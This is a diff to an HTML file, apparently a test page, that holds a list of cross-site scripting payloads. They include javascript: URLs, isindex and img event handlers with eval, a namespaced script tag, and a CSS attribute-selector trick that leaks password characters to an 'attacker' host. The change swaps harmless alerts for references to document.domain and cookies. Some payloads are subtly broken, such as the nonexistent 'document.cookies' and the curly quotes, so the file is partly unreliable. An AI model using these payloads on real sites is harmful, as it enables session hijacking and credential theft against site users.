--- a/rana.html
+++ b/rana.html
@@ -1,7 +1,7 @@
 <img/src="mars.png"alt="mars">
-<object><param name="src" value= "javascript:alert(0)"></param></object> 
-<isindex type=image src=1 onload=alert(1)> <isindex action=javascript:alert(1) type=image> 
-<img src=x:alert(alt) onerror=eval(src) alt=0> 
+<object><param name="src" value= "javascript:alert(document.domain)"></param></object> 
+<isindex type=image src=1 onload=alert(document.cookies)> <isindex action=javascript:alert(1) type=image> 
+<img src=x:alert(alt) onerror=eval(src) alt=document.cookies> 
 <x:script xmlns:x="http://www.w3.org/1999/ xhtml">alert('xss');</x:script> 
 </a onmousemove="alert(1)"> 
 <style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=”login.asp”/> 
